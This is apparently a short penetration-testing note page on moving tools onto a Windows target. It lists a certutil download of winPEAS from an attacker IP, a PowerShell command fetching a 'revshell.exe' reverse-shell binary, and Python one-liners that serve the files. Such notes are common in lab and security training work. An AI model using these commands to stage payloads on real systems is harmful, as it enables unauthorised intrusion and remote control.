certutil.exe -urlcache -split -f http://10.10.14.36:8000/winPEASany.exe winpeas.exe
powershell -c "Invoke-WebRequest -Uri 'http://$IP:9000/revshell.exe' -OutFile 'c:\tmp\revshell.exe'"
python -m SimpleHTTPServer 80
python3 -m http.server 80
Last updated 2 years ago